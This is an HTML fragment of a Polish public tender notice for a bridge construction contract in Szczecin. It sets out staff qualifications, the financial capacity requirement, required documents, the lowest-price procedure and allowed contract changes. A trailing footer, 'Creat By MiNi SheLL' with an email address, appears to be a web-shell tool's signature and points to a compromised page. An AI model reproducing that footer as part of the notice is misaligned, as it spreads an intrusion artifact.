A.  dysponują lub będą dysponować co najmniej nw. osobami:
AA.	kierownik budowy - osoba posiadająca następujące wykształcenie, doświadczenie i kwalifikacje:
-	wykształcenie wyższe, 
-	uprawnienia budowlane do kierowania robotami budowlanymi 
w  specjalności  mostowej,
              -	co najmniej 6-letnie doświadczenie zawodowe jako kierownik budowy, w tym przy wykonywaniu obiektu mostowego nad przeszkoda wodną, o wartości prac nie mniejszej niż 5 000 000,00 zł,
BB.	kierownik robót drogowych - osoba posiadająca następujące wykształcenie, doświadczenie i kwalifikacje:
-	wykształcenie wyższe, 
-	uprawnienia budowlane do kierowania robotami budowlanymi 
w  specjalności  drogowej,
              -	co najmniej 5-letnie doświadczenie zawodowe jako kierownik budowy lub kierownik robót branży drogowej, w tym przy wykonywaniu robót drogowych związanych z budową mostów, wiaduktów lub estakad, 
CC.	kierownik robót elektrycznych - osoba posiadająca następujące wykształcenie, doświadczenie i kwalifikacje:
-	wykształcenie wyższe, 
-	uprawnienia budowlane do kierowania robotami budowlanymi 
w  specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  elektrycznych i elektroenergetycznych,
              -	co najmniej 5-letnie doświadczenie zawodowe jako kierownik budowy lub kierownik robót branży elektrycznej, 
DD.	kierownik robót sanitarnych - osoba posiadająca następujące wykształcenie, doświadczenie i kwalifikacje:
-	wykształcenie wyższe, 
-	uprawnienia budowlane do kierowania robotami budowlanymi 
w  specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych 
i kanalizacyjnych,
              -	co najmniej 5-letnie doświadczenie zawodowe jako kierownik budowy lub kierownik robót branży sanitarnej, 
EE.	osoba kierująca pracami w zakresie zieleni - osoba posiadająca następujące wykształcenie, doświadczenie i kwalifikacje:
-	wykształcenie co najmniej średnie ogrodnicze lub o kierunku: architektura krajobrazu,  
-	co najmniej 5-letnie doświadczenie zawodowe w kierowaniu pracami przy zakładaniu terenów zieleni lub wykonywaniu prac pielęgnacyjnych na terenach zieleni. 

Uwaga! Zamawiający dopuszcza możliwość łączenia wyżej opisanych specjalności.
Zgodnie z art. 104 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. 
z 2010 r. Nr 243 poz. 1623 ze zmianami) osoby, które przed dniem wejścia 
w życie ustawy uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji 
w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. 
Ponadto, zgodnie z art. 12a ustawy Prawo budowlane, samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.   O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	spełniają warunki określone w art. 22 ust. 1 ustawy, dotyczące m. in.:
	a) sytuacji ekonomicznej i finansowej, poprzez wykazanie, że  zdolność kredytowa lub wysokość posiadanych środków, jest nie mniejsza niż 400 000,00 zł.

W przypadku, gdy jakakolwiek wartość dotycząca ww. warunków została wyrażona w walucie obcej, Zamawiający przeliczy tą wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia publicznego (datą wszczęcia postępowania jest data zamieszczenia ogłoszenia o zamówieniu w miejscu publicznie dostępnym w siedzibie Zamawiającego oraz na stronie internetowej).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
       1)  ofertę cenową - zgodnie z rozdziałem I pkt 3 SIWZ;
 	W przypadku składania oferty wspólnej należy złożyć jedną ofertę cenową ;
       2) odpowiednie pełnomocnictwa;  
	Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub 
	w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ); 

       3)	oświadczenie według wzoru stanowiącego załącznik nr 1, wskazujące cześć 			zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli 			wykonawca przewiduje udział podwykonawców);
            W przypadku składania oferty wspólnej należy złożyć jedno oświadczenie.
	Zamawiający zastrzega, że część przedmiotu zamówienia polegająca na budowie mostu stałego wraz z przyczółkami nie może być powierzona podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty z powodu: 
1)	  braku lub wady dokumentacji projektowej lub wystąpienia konieczności wykonania dokumentacji zamiennej;
2)	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązujących przepisów, powodujące wstrzymanie robót na co najmniej 7 dni roboczych kolejno następujących po sobie, przy czym fakt wstrzymania robót musi być potwierdzony wpisem do dziennika budowy; za wyjątkowo niesprzyjające warunki atmosferyczne należy uważać warunki atmosferyczne znacząco odbiegające od średnich warunków atmosferycznych z ostatnich 5 lat przed realizacją przedmiotu umowy, w okresie analogicznym do badanego, zanotowanych przez Instytut Meteorologii i Gospodarki Wodnej dla obszaru m. Szczecin; 
3) 	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da 		   się 	przewidzieć, np. huragan, powódź;
	4)  	wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja
           	ma wpływ na termin wykonania umowy;
 5)	  wystąpienia nieprzewidzianych warunków realizacji, w tym zmiany sposobu świadczenia;
 6)	  zmiany stanu prawnego;
 7)	  nieterminowego przekazania placu budowy przez Zamawiającego, z winy Zamawiającego, o ile ma to wpływ na termin wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; pok. 17-18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2011 godzina 10:00, miejsce: Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (oryginał lub kopia poświadczona za zgodność z oryginałem przez te podmioty) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  
2. Jeżeli wykonawca wykazując spełnianie warunku, o którym mowa w pkt 1 ppkt 1 lit.d rozdziału V SIWZ (art. 22 ust. 1 pkt 4 ustawy), polega na zdolnościach finansowych innych podmiotów (na zasadach określonych w pkt 4 rozdziału V SIWZ), wymaga się przedłożenia informacji, o której mowa w pkt 2 ppkt 6  rozdziału V SIWZ dotyczącej tych podmiotów. 
3.	W przypadku podmiotów, o których mowa w pkt powyżej, przedkładane przez wykonawcę kopie dokumentów dotyczących każdego z tych podmiotów muszą być poświadczone za zgodność z oryginałem przez te podmioty. 
4.	Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com